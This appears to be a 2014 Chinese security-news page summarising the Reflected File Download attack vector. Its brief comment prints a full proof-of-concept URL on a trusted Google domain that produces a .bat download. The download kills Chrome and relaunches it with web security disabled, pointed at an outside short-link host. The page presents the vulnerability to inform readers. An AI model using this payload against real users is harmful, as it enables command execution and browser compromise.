首页
新闻
技术
技能
专题
书籍
成员
聚合
投稿
首页
/
安全技术
2014-10-31
Reflected File Download - A New Web Attack Vector
提交作者:
qiaoy
所属分类:
漏洞分析
简评
在可信域名构造恶意下载,代码如下: https://www.google.com/s;/ChromeSetup.bat;/ChromeSetup.bat?gs_ri=psy-ab&q="||taskkill /F /IM ch*|md||start chrome pi.vu/B2jk --disable-web-security --disable-popup-blocking|| 可直接执行系统命令或重置chrome,进入非安全模式,进行各种攻击。
相关资讯
2024信息安全领域四大顶会Fuzz论文汇总
大模型应用实践系列三:用大模型挖漏洞
函数级漏洞检测器对跨函数漏洞的有效性研究
LLM4Decompile-End:大模型反编译
动态二进制插桩trace 破解函数式编程混淆
Fuzzing原理探究:boofuzz背后的生成算法
PWN入门:偷吃特权-SetUID
通过从协议规范文档中提取有限状态机来自动合成攻击
Nmap识别MongoDB 6.0指纹
野蛮fuzz:持久性fuzz
评论
请登陆后评论
登陆